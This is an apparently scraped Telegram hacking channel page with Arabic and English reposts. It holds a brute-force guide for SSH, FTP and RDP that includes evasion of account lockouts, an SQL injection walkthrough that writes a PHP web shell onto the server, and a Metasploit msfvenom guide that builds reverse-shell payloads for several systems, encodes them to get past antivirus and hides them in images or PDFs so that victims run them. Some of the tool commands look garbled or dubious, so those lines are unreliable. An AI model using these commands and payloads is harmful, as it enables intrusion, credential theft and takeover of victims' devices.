es
Feedback
Linux Hacks & Cyber Craft

Linux Hacks & Cyber Craft

Ir al canal en Telegram

🚩 Channel was restricted by Telegram

Mostrar más
Sin datos
Suscriptores
-624 horas
-457 días
-14930 días
Archivo de publicaciones
This channel can’t be displayed because it violated Telegram's Terms of Service.

أهلاً وسهلاً بكم جميعاً، هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني. @end_k
قناتنا المشتركة والتي تحتوي على بثوث مباشرة ومحتوى مميز وغير مسبوق.
@iiLinux
قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.
@GlobalRedHat
المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.
@k7ali_linux
قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.
@ExploitQuest
قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.
@EgyptianshieldTOOLS
قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.
@iiMrDark
قناة تقدم محتوى خاص بالتسريبات والبرامج.
@Wa3i_Tech
قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.
@codearabs
قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.
@Egyshield
قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.
@Bad_Rabbit_Team
قناة Bad Rabbit – قناة متخصصة في الهجمات السيبرانية، تقدم شروحات عملية عن اختبار الاختراق، تحليل الثغرات، وأدوات الهجوم الإلكتروني.
@GlobalRedTeam
المجتمع الرسمي لـGlobal Red Team
@darkcsc
قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.

أهلاً وسهلاً بكم جميعاً، هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني. @end_k
قناتنا المشتركة والتي تحتوي على بثوث مباشرة ومحتوى مميز وغير مسبوق.
@iiLinux
قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.
@GlobalRedHat
المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.
@k7ali_linux
قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.
@ExploitQuest
قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.
@EgyptianshieldTOOLS
قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.
@iiMrDark
قناة تقدم محتوى خاص بالتسريبات والبرامج.
@Wa3i_Tech
قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.
@codearabs
قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.
@Egyshield
قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.
@Bad_Rabbit_Team
قناة Bad Rabbit – قناة متخصصة في الهجمات السيبرانية، تقدم شروحات عملية عن اختبار الاختراق، تحليل الثغرات، وأدوات الهجوم الإلكتروني.
@GlobalRedTeam
المجتمع الرسمي لـGlobal Red Team
@darkcsc
قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.

أهلاً وسهلاً بكم جميعاً، هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني. @end_k
قناتنا المشتركة والتي تحتوي على بثوث مباشرة ومحتوى مميز وغير مسبوق.
@iiLinux
قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.
@GlobalRedHat
المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.
@k7ali_linux
قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.
@ExploitQuest
قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.
@EgyptianshieldTOOLS
قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.
@iiMrDark
قناة تقدم محتوى خاص بالتسريبات والبرامج.
@Wa3i_Tech
قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.
@codearabs
قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.
@Egyshield
قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.
@Bad_Rabbit_Team
قناة Bad Rabbit – قناة متخصصة في الهجمات السيبرانية، تقدم شروحات عملية عن اختبار الاختراق، تحليل الثغرات، وأدوات الهجوم الإلكتروني.
@GlobalRedTeam
المجتمع الرسمي لـGlobal Red Team
@darkcsc
قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.

مواقع لا يعرفها الكثير هذه المواقع ضرورية لمختبري الاختراق والباحثين في الأمن السيبراني، حيث تساعد في جمع المعلومات، تحليل الثغرات، وتحديد الهجمات المحتملة.
1. shodan.io – محرك بحث للأجهزة المتصلة بالإنترنت، يساعد في اكتشاف الخوادم والكاميرات وأي أجهزة أخرى مكشوفة. 2. google.com – يمكن استخدامه مع *Google Dorks* للعثور على ملفات حساسة، بيانات مكشوفة، وثغرات أمنية. 3. wigle.net – يوفر خريطة لشبكات الواي فاي، مما يساعد في عمليات اختبار الاختراق اللاسلكي. 4. grep.app – محرك بحث للشفرة المصدرية، مفيد لاكتشاف الأخطاء الأمنية في الأكواد المفتوحة المصدر. 5. app.binaryedge.io – يوفر معلومات استخباراتية عن التهديدات، مثل المنافذ المفتوحة والخدمات النشطة. 6. onyphe.io – أداة بحث عن بيانات الاستضافة والخوادم المفتوحة على الإنترنت. 7. viz.greynoise.io – يساعد في تحليل النشاطات المشبوهة على الإنترنت، مثل عمليات المسح الضارة. 8. censys.io – محرك بحث للأجهزة المتصلة بالإنترنت، مثل شودان لكنه يقدم بيانات أعمق. 9. hunter.io – أداة للبحث عن عناوين البريد الإلكتروني المرتبطة بالمواقع، مفيدة لاختبار الهندسة الاجتماعية. 10. fofa.info – محرك بحث للأجهزة والخوادم، يستخدم لاستخراج بيانات تحليلية حول الإنترنت. 11. zoomeye.org – مشابه لـ Shodan وCensys، لكنه يوفر رؤى إضافية حول الأجهزة والخدمات. 12. leakix.net – يكتشف البيانات والتسريبات المكشوفة عبر الإنترنت. 13. intelx.io – منصة OSINT تتيح البحث عن البيانات المسربة، الوثائق، والعناوين الإلكترونية. 14. app.netlas.io – محرك بحث للهجمات السطحية، يكشف عن الخدمات والتطبيقات المكشوفة. 15. searchcode.com – أداة بحث عن الأكواد المصدرية، مفيدة لمراجعة الثغرات الأمنية في الأكواد. 16. urlscan.io – يحلل عناوين URL المشبوهة ويساعد في فحص التهديدات المرتبطة بالمواقع. 17. publicwww.com – محرك بحث للشفرة المصدرية، يسمح بالبحث عن تقنيات أو كود معين داخل مواقع الويب. 18. fullhunt.io – يتيح تحليل البنية التحتية للشركات وفهم سطح الهجوم المتاح. 19. socradar.io – يوفر معلومات استخباراتية عن التهديدات والأصول الرقمية المكشوفة. 20. binaryedge.io – أداة لاكتشاف الأجهزة والخوادم المتصلة بالإنترنت وتحليل بياناتها. 21. ivre.rocks – منصة استخبارات للشبكات، تساعد في البحث عن عناوين IP والمنافذ المفتوحة. 22. crt.sh – محرك بحث عن شهادات SSL، يستخدم للبحث عن النطاقات الفرعية والخدمات المتاحة. 23. vulners.com – قاعدة بيانات ضخمة للثغرات الأمنية، تساعد في البحث عن CVEs والاستغلالات المتاحة. 24. pulsedive.com – أداة استخباراتية لتحليل التهديدات وفحص المؤشرات الخبيثة.

كسر كلمات المرور بالقوة الغاشمة في Kali Linux باستخدام Hydra وMedusa وNcrack
 🚀 مقدمة في عالم اختبار الاختراق، واحدة من أهم المهام هي كسر كلمات المرور، خصوصًا للأجهزة والخدمات التي تكون مُعرّضة للخطر بسبب ضعف كلمات المرور! 😈
في هذا الدليل الاحترافي، سنتعلم:
✅ كيفية استخدام Hydra وMedusa وNcrack لكسر كلمات المرور ✅ استهداف أجهزة وخدمات مثل SSH وFTP وRDP ✅ تجاوز الحماية مثل تأخير الاستجابات والقفل المؤقت ✅ أفضل الممارسات لتسريع الهجمات وتحقيق أفضل النتائج
⚠ تنبيه قانوني: هذه الأدوات مخصصة لاختبار الاختراق القانوني فقط! تأكد من أنك مخوّل لاستخدامها قبل تجربة أي شيء! 🚨
━━━━━━━━━━━━━━━━━━
1️⃣ أداة Hydra: وحش كسر كلمات المرور
Hydra واحدة من أقوى الأدوات لكسر كلمات المرور عبر Brute Force على بروتوكولات مثل SSH, FTP, RDP, HTTP, Telnet وغيرهم. 📌 كسر كلمة مرور SSH باستخدام Hydra
hydra -l root -P passwords.txt ssh://192.168.1.100
🔹 -l root → اسم المستخدم المستهدف 🔹 -P passwords.txt → قائمة كلمات المرور 🔹 ssh://192.168.1.100 → عنوان IP للجهاز الهدف ✅ مثال عملي: إذا كنت تريد تجربة عدة أسماء مستخدمين مع كلمات مرور مختلفة:
hydra -L users.txt -P passwords.txt ssh://192.168.1.100
🔹 -L users.txt → ملف يحتوي على قائمة بأسماء المستخدمين 📌 كسر كلمة مرور HTTP Basic Auth باستخدام Hydra إذا كان موقع محمي بـ HTTP Basic Authentication، يمكنك اختباره بـ:
hydra -L users.txt -P passwords.txt 192.168.1.100 http-get /admin
🔹 http-get /admin → يشير إلى أن الهدف هو صفحة تسجيل دخول في /admin ━━━━━━━━━━━━━━━━━━
2️⃣أداة Medusa: القوة والسرعة مع الهجمات المتزامنة 🚀
Medusa تشبه Hydra لكنها أسرع في بعض الحالات بسبب الهجمات المتزامنة (Parallel Attacks). 📌 كسر كلمة مرور FTP باستخدام Medusa
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ftp
🔹 -h 192.168.1.100 → عنوان الهدف 🔹 -u admin → اسم المستخدم 🔹 -P passwords.txt → قائمة كلمات المرور 🔹 -M ftp → استهداف بروتوكول FTP ✅ ميزة Medusa: تدعم تشغيل عدة جلسات متزامنة مما يجعلها أسرع في بعض البيئات! ━━━━━━━━━━━━━━━━━━
3️⃣ أداة Ncrack: الأقوى لاختبار كلمات المرور على الشبكة 🔥
Ncrack مصممة خصيصًا لكسر كلمات مرور الخدمات الشبكية مثل SSH, RDP, VNC, SMB, FTP, HTTP. 📌 كسر كلمة مرور RDP (سطح المكتب البعيد) باستخدام Ncrack
ncrack -U users.txt -P passwords.txt rdp://192.168.1.100
🔹 rdp://192.168.1.100 → اختبار خدمة سطح المكتب البعيد على الجهاز الهدف 📌 كسر كلمة مرور FTP باستخدام Ncrack
ncrack -U users.txt -P passwords.txt ftp://192.168.1.100
✅ Ncrack يتميز بأنه أسرع وأكثر استقرارًا عند التعامل مع خدمات الشبكة واسعة النطاق. ━━━━━━━━━━━━━━━━━━
4️⃣ تجاوز الحماية وزيادة كفاءة الهجوم
🔹بعض الأنظمة لديها حماية ضد Brute Force مثل تأخير الاستجابة أو قفل الحساب بعد محاولات فاشلة. 📌 تقليل سرعة الهجوم لتجنب الحظر في Hydra، يمكنك ضبط التأخير بين المحاولات بـ -t و -w:
hydra -L users.txt -P passwords.txt -t 4 -w 5 ssh://192.168.1.100
🔹 -t 4 → استخدام 4 جلسات متزامنة 🔹 -w 5 → انتظار 5 ثوانٍ بين كل محاولة
📌 تجربة كلمات مرور شائعة أولًا (هجوم ذكي) 🔥
قبل تجربة قائمة ضخمة من كلمات المرور، جرب أشهر 10 كلمات مرور شائعة (مثلاً: admin, 123456, password, root).
head -n 10 rockyou.txt > top10.txt hydra -L users.txt -P top10.txt ssh://192.168.1.100
✅ بهذه الطريقة، تزيد فرص النجاح بسرعة قبل تجربة القائمة الكاملة! ━━━━━━━━━━━━━━━━━━
🔥 الخلاصة: أي أداة هي الأفضل؟ 🤔
🔹 إذا كنت تريد أداة قوية ومتعددة الاستخدامات، استخدم Hydra، لأنها تدعم عددًا كبيرًا من البروتوكولات مثل SSH وHTTP وFTP. 🔹 إذا كنت بحاجة إلى السرعة في الاختبار، فجرب Medusa، لأنها تدعم الهجمات المتزامنة، مما يجعلها أسرع في بعض السيناريوهات. 🔹 أما إذا كنت تستهدف خدمات الشبكة مثل RDP وSMB، فإن Ncrack هو الخيار الأفضل، لأنه مصمم خصيصًا لكسر كلمات المرور على الشبكات الكبيرة بكفاءة
📢 🚀 تابع قناتنا لتتعلم أقوى تقنيات اختبار الاختراق! 🔥
[https://t.me/k7ali_linux]

Repost from Global Red Team
أهلاً وسهلاً بكم جميعاً، هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني. @iiLinux
قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.
@GlobalRedHat
المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.
@k7ali_linux
قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.
@ExploitQuest
قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.
@EgyptianshieldTOOLS
قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.
@iiMrDark
قناة تقدم محتوى خاص بالتسريبات والبرامج.
@Wa3i_Tech
قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.
@codearabs
قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.
@Egyshield
قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.
@GlobalRedTeam
المجتمع الرسمي لـGlobal Red Team
@darkcsc
قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.

Repost from ExploitQuest
"I discovered a vulnerability in a website that allowed me to escalate my privileges from a regular user to an admin. This privilege escalation granted me access to other users' data, the full database, and the admin control panel." https://t.me/ExploitQuest

Repost from ExploitQuest
Finding SQL Injection Vulnerabilities in Multiple Ways with Examples + Achieving RCE via SQLi
SQL Injection (SQLi) is one of the most critical web vulnerabilities, allowing an attacker to manipulate database queries, extract sensitive data, modify records, or even execute system commands (RCE - Remote Code Execution). This article will explore multiple ways to detect SQLi vulnerabilities with practical examples and then demonstrate how SQLi can lead to RCE. ━━━━━━━━━━━━━━━━━━
1. Discovering SQL Injection Vulnerabilities in Multiple Ways
🔹Method 1: Manual Testing with Special Characters The simplest way to test for SQL Injection is by inserting special characters such as:
' " -- # ;
Example 1: Injecting a Single Quote
'
If a website has a login page like:
https://example.com/login.php?user=admin
Try entering:
https://example.com/login.php?user=admin'
If an error appears like:
You have an error in your SQL syntax...
It indicates an SQL Injection vulnerability. ━━━━━━━━━━━━━━━━━━ 🔹Method 2: Injecting Simple SQL Queries If the backend SQL query looks like this:
SELECT * FROM users WHERE username = '$user' AND password = '$pass'
You can try the following payloads:
admin' --
or
' OR '1'='1' --
If you gain access without entering a password, the application is vulnerable. ━━━━━━━━━━━━━━━━━━ 🔹 Method 3: Using SQLMap for Automated Testing 🔹 SQLMap is a powerful tool for automated SQL Injection detection. Run:
sqlmap -u "https://example.com/login.php?user=admin" --dbs
SQLMap will analyze the URL and extract the database names if vulnerable. ━━━━━━━━━━━━━━━━━━ 🔹Method 4: Testing with SQL Sleep (Time-Based SQLi) If error messages are hidden, you can test for Time-Based SQLi:
https://example.com/page?id=1' AND SLEEP(5) --
If the page takes 5 seconds to load, the database is likely vulnerable. ━━━━━━━━━━━━━━━━━━ 🔹Method 5: Data Extraction via UNION-Based SQL Injection If a website displays data from a database, try injecting a UNION SELECT query:
https://example.com/page?id=1 UNION SELECT 1,2,3,4 --
If numbers or unexpected data appear, the website is vulnerable. ━━━━━━━━━━━━━━━━━━ 2. Escalating SQL Injection to RCE (Remote Code Execution) If SQL Injection allows file operations via LOAD_FILE() or OUTFILE, you can execute commands on the server. 🔹Example: Uploading a Web Shell via SQLi
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
Now, access the shell through:
http://target.com/shell.php?cmd=whoami
🔹If SQL Server has xp_cmdshell enabled, execute system commands like:
EXEC xp_cmdshell 'whoami';
This will return the current system user running the database service. ━━━━━━━━━━━━━━━━━━ 3. Exploiting SQL Injection to Gain Admin Access In some cases, SQLi can be used to escalate privileges by modifying session data:
UPDATE users SET is_admin = 1 WHERE username = 'victim';
Or steal an admin session:
SELECT session_id FROM users WHERE username = 'admin';
💡 Conclusion
•Test manually using ' and OR 1=1 •Use SQLMap for automatic SQLi detection •Escalate SQLi to RCE if the system allows file operations •Test SQL Sleep (Time-Based Injection) for hidden errors •Use UNION SELECT to extract sensitive data ━━━━━━━━━━━━━━━━━━
🚀 Join now
[https://t.me/ExploitQuest] #SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE #Malware #ReverseEngineering

تكمله المنشور: ✅ تُستخدم في اختبار الاختراق والطب الشرعي الرقمي لكشف الأدلة الرقمية. ✅ يمكنك تعديل أو حذف البيانات الوصفية لحماية خصوصيتك. 📢 هل تريد تعلم المزيد من أدوات التحقيق الرقمي واختبار الاختراق؟
📌 انضم إلى قناتنا على تيليجرام:
https://t.me/k7ali_linux https://t.me/k7ali_linux

🔍 شرح أداة ExifTool – استخراج البيانات المخفية من الصور والملفات 🔥
إذا كنت تعمل في مجال تحليل الجرائم الإلكترونية، اختبار الاختراق، أو التحقيق الرقمي، فبالتأكيد ستحتاج إلى أداة قوية لاستخراج وتحليل البيانات المخفية داخل الملفات! هنا تأتي ExifTool، الأداة الاحترافية لاستخراج وتحليل Metadata (البيانات الوصفية) من الصور والملفات المختلفة. في هذا المقال، سنتعلم: ✅ ما هي ExifTool وكيف تعمل؟ ✅ كيفية تثبيتها على Kali Linux؟ ✅ أهم الأوامر لاستخراج وتحليل البيانات الوصفية. ✅ كيفية تعديل أو حذف الـ Metadata لإخفاء أثرك! ━━━━━━━━━━━━━━━━━━
💡 ما هي ExifTool؟ ولماذا هي مهمة؟
ExifTool هي أداة مفتوحة المصدر تُستخدم لقراءة وتعديل البيانات الوصفية (Metadata) المخفية داخل الملفات، مثل: 📷 الصور (JPEG, PNG, TIFF, WebP) 📄 المستندات (PDF, DOCX, PPTX) 🎥 ملفات الفيديو (MP4, AVI, MOV)
🎯 لماذا هي مفيدة؟
🔹 تساعد في تحليل الصور والملفات لكشف مصدرها الأصلي. 🔹 تُستخدم في التحقيق الرقمي لكشف معلومات سرية عن المجرمين. 🔹 تساعد الهاكرز الأخلاقيين في فحص الملفات بحثًا عن البيانات المخفية. 🔹 تُستخدم في إزالة بيانات الموقع والمعلومات الشخصية قبل نشر الملفات. ━━━━━━━━━━━━━━━━━━
🚀 تثبيت ExifTool على Kali Linux
🔹 1. التأكد من وجود الأداة
exiftool -ver
إذا لم تكن مثبتة، يمكنك تثبيتها بسهولة: 🔹 2. تثبيت ExifTool
sudo apt update && sudo apt install exiftool -y
عد التثبيت، تأكد من أنها تعمل:
exiftool -ver
🎯 الآن أنت جاهز لاستخدام ExifTool لاستخراج وتحليل البيانات الوصفية! ━━━━━━━━━━━━━━━━━━
🛠️ أهم أوامر ExifTool لتحليل البيانات المخفية
📌 1️⃣ استخراج جميع البيانات المخفية من صورة أو ملف
exiftool image.jpg
✅ سيعرض جميع المعلومات المخفية داخل الصورة، مثل: •نوع الكاميرا المستخدمة. •تاريخ التقاط الصورة. •إحداثيات GPS (إذا كانت مفعلة). •بيانات التعديل على الصورة. ━━━━━━━━━━━━━━━━━━ 📌 2️⃣ استخراج بيانات GPS من صورة (لتحديد الموقع الجغرافي) 🌍
exiftool -GPSLatitude -GPSLongitude image.jpg
✅ إذا التُقطت الصورة من هاتف محمول، ستظهر إحداثيات GPS الخاصة بموقع التقاطها! 🔹 يمكنك استخدام هذه الإحداثيات في Google Maps لمعرفة الموقع الحقيقي للصورة. ━━━━━━━━━━━━━━━━━━ 📌 3️⃣ استخراج بيانات الكاميرا المستخدمة في التصوير 📷
exiftool -Make -Model -Lens image.jpg
✅ سيعرض: 📌 نوع الكاميرا (مثال: Nikon, Canon, iPhone 13) 📌 نوع العدسة المستخدمة. ━━━━━━━━━━━━━━━━━━ 📌 4️⃣ تحليل البيانات المخفية في مستندات PDF
exiftool report.pdf
✅ سيعرض: 📌 اسم المؤلف الأصلي. 📌 البرنامج المستخدم لإنشاء الملف. 📌 تاريخ التعديل الأخير.
🎯 مهم جدًا في التحقيقات الرقمية لكشف الجهة التي أنشأت المستند!
━━━━━━━━━━━━━━━━━━
🛑 كيف تحذف البيانات الوصفية لإخفاء أثرك؟
إذا كنت لا تريد أن يكشف شخص ما المعلومات المخفية في ملفاتك، يمكنك حذفها بسهولة باستخدام ExifTool! 📌 1️⃣ حذف جميع البيانات الوصفية من صورة (إخفاء المصدر)
exiftool -all= image.jpg
✅ سيحذف جميع المعلومات مثل: ❌ بيانات الكاميرا. ❌ تاريخ الالتقاط. ❌ إحداثيات GPS.
🔹 هذا مفيد جدًا عند نشر الصور لحماية خصوصيتك!
━━━━━━━━━━━━━━━━━━ 📌 2️⃣ تعديل بيانات الصورة (لتضليل التتبع)
exiftool -Artist="Anonymous" -Copyright="None" image.jpg
✅ يمكنك تغيير بيانات المؤلف وحقوق النشر إلى أي شيء تريده! ━━━━━━━━━━━━━━━━━━
🎯 أمثلة عملية لاستخدام ExifTool في التحقيقات الرقمية
1️⃣ كشف مصدر صورة مسربة إذا وجدت صورة منتشرة على الإنترنت وتريد معرفة مصدرها، قم بتنزيلها ثم شغل:
exiftool image.jpg
✅ إذا لم تُحذف بيانات الـ Metadata، يمكنك معرفة: 📌 نوع الكاميرا أو الهاتف المستخدم. 📌 موقع التقاط الصورة (إذا كانت بيانات GPS موجودة). 📌 تاريخ التعديل على الصورة. ━━━━━━━━━━━━━━━━━━ كشف بيانات ملف PDF مجهول المصدر إذا وصلك ملف PDF مشبوه، استخدم:
exiftool report.pdf
✅ سيكشف لك: 📌 اسم الشخص الذي أنشأ المستند. 📌 البرنامج الذي استُخدم في إنشائه. 📌 تاريخ التعديل الأخير. ━━━━━━━━━━━━━━━━━━ 3️⃣ تتبع صور المجرمين عبر GPS إذا وجدت صورة يُعتقد أنها ملتقطة في مكان معين، استخدم:
exiftool -GPSLatitude -GPSLongitude image.jpg
✅ ستظهر الإحداثيات الجغرافية! يمكنك إدخالها في Google Maps لمعرفة الموقع بدقة. ━━━━━━━━━━━━━━━━━━
🔥 الخلاصة: ExifTool سلاح المحترفين في التحقيق الرقمي!
✅ يستخدمها المحترفون في تحليل الصور والمستندات لكشف المعلومات المخفية. ✅ يمكنها تتبع مصدر الصور والمستندات ومعرفة تفاصيلها السرية.

Repost from Global Red Hat
Join our group انضموا إلى مجموعتنا https://t.me/GlobalRedHatGroup

Repost from Global Red Team
أهلاً وسهلاً بكم جميعاً، هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني. @iiLinux
قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.
@GlobalRedHat
المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.
@k7ali_linux
قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.
@ExploitQuest
قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.
@EgyptianshieldTOOLS
قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.
@iiMrDark
قناة تقدم محتوى خاص بالتسريبات والبرامج.
@Wa3i_Tech
قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.
@codearabs
قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.
@Egyshield
قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.
@GlobalRedTeam
المجتمع الرسمي لـGlobal Red Team
@darkcsc
قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.

Repost from Global Red Team
🔹 هينتج لك كود C جاهز تستخدمه في برمجة برمجيات خبيثة متقدمة! ━━━━━━━━━━━━━━━━━━ 🚨 نصائح احترافية لتجنب اكتشاف الـ Payloads 🚨 ✅ استخدم Encoders زي shikata_ga_nai لإخفاء الـ Payload. ✅ دمج الـ Payload داخل ملفات نظيفة زي الصور أو المستندات لزيادة احتمالية تنفيذه. ✅ استخدم Obfuscation Tools زي Veil أو Shellter لتجنب اكتشافه. ✅ غير الـ Signatures الخاصة بالـ Payload عشان تتجاوز برامج الحماية. ━━━━━━━━━━━━━━━━━━ 🎯 الخلاصة: 🔹 Metasploit بيقدّم طرق لا نهائية لإنشاء الـ Payloads، وكل طريقة ليها استخدام مختلف حسب نوع الهدف. 🔹 msfvenom هو أقوى أداة لإنشاء وتشفير الـ Payloads، ومهم جدًا تعرف كل أسراره لو عاوز تبقى محترف في الاختراق الأخلاقي. 🔹 لازم تكون فاهم إزاي تتخطى الحمايات الحديثة، وإزاي تخلي الـ Payload غير مكشوف. ━━━━━━━━━━━━━━━━━━
📢 ❌ تحذير: المعلومات دي للأغراض التعليمية فقط! استخدمها في اختبار الأمان وحماية الأنظمة، مش في أي أنشطة غير قانونية.
📢 انضم لقناتنا على تيليجرام لمزيد من شروحات الاختراق الأخلاقي وأمن المعلومات! 🔥💻 https://t.me/GlobalRedTeam

Repost from Global Red Team
🔥 كل طرق إنشاء الـ Payloads في Metasploit زي المحترفين 🔥 🤔 إيه هو الـ Payload؟
الـ Payload ببساطة هو الكود اللي بيتنفذ على جهاز الضحية بعد نجاح الاختراق، وبيفتح لك باب التحكم الكامل في الجهاز. في Metasploit، فيه أنواع كتير من الـ Payloads، وأي واحد فيهم بيستخدم حسب الهدف اللي عاوز توصله. ━━━━━━━━━━━━━━━━━━
🚀 أنواع الـ Payloads في Metasploit
✅ Reverse Shell → الضحية بيتصل عليك، وبيفتح لك تحكم كامل في جهازه. ✅ Bind Shell → الضحية بيفتح بورت على جهازه، وانت تتصل عليه. ✅ Meterpreter → أقوى وأخطر Payload، بيديك سيطرة كاملة وأوامر متطورة زي تشغيل الكاميرا والمايك، تحميل الملفات، وغيرها. ✅ Staged vs. Stageless → الـ Staged بيحمل البيانات تدريجيًا، أما Stageless بيحمل كل حاجة من البداية. ━━━━━━━━━━━━━━━━━━
🛠️ 1. إنشاء Payload باستخدام Msfvenom
msfvenom هو الوحش المسؤول عن توليد الـ Payloads، وبيستخدم لإنشاء فيروسات مخصصة لأي نظام تشغيل. 🎯 إنشاء Payload للـ Windows (Meterpreter Reverse Shell)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe > payload.exe
💡 بعد تشغيل الـ Payload على جهاز الضحية، افتح Metasploit واكتب:
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.101 set LPORT 4444 exploit
🎯 بمجرد ما الضحية يشغل الـ payload.exe، هيجيلك جلسة Meterpreter للتحكم في الجهاز بالكامل. ━━━━━━━━━━━━━━━━━━
📱 2. إنشاء Payload للأندرويد (APK)
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -o payload.apk
💡 بعد ما الضحية يثبت التطبيق، شغل Metasploit:
use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST 192.168.1.101 set LPORT 4444 exploit
 🎯 دلوقتي تقدر تتحكم في موبايله بالكامل، تفتح الكاميرا، تسجل الصوت، تنقل الملفات، وغيرهم! ━━━━━━━━━━━━━━━━━━
🐧 3. إنشاء Payload لل- Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f elf > payload.elf
🔹 بمجرد ما الضحية يشغل الملف، هتحصل على جلسة Meterpreter على نظام Linux. ━━━━━━━━━━━━━━━━━━
🍏 4. إنشاء Payload للماك (macOS)
msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f macho > payload.macho
🔥 مناسب لاختراق أجهزة Apple ! ━━━━━━━━━━━━━━━━━━
⚡ 5. إنشاء Payload كـ PowerShell Script (لتخطي الحمايات)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f psh > payload.ps1
🎯 ده مفيد جدًا لاختراق الأجهزة اللي فيها حماية قوية لأنه بيشتغل جوه الـ PowerShell بدون مشاكل. ━━━━━━━━━━━━━━━━━━
🔒 6. إنشاء Payload مخفي باستخدام التشفير (Bypassing AVs)
❌ برامج الحماية الحديثة بقت تكشف الـ Payloads بسرعة، وعشان كده لازم نستخدم التشفير. 🔹 تشفير الـ Payload باستخدام Shikata Ga Nai (Encoder)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encrypted_payload.exe
✅ بكده فرص اكتشافه من برامج الحماية بتقل جدًا! ━━━━━━━━━━━━━━━━━━
🖼️ 7. دمج الـ Payload داخل صورة أو PDF
🎯 إخفاء الـ Payload جوه ملفات عادية يخلي الضحية يشغلها بدون شك. 🔹 دمج الـ Payload داخل صورة (JPG)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe > payload.exe veil-evasion -p paylo ad.exe -o infected.jpg
🔸 مجرد ما الضحية يفتح الصورة، الـ Payload هيشتغل في الخلفية! 🔹 دمج ال Payload داخل ملف PDF
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f raw > payload.bin spoorge -i original.pdf -o infected.pdf -e payload.bin
⚠️ بعض إصدارات Adobe الحديثة ممكن تكتشف التلاعب ده، فالأفضل تستخدم طرق تانية. ━━━━━━━━━━━━━━━━━━
🐍 8. إنشاء Payload بلغة Python للاختراق المتعدد الأنظمة)
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f raw > payload.py
💡 مناسب جدًا لاختراق Windows، Linux، وMac في نفس الوقت. ━━━━━━━━━━━━━━━━━━
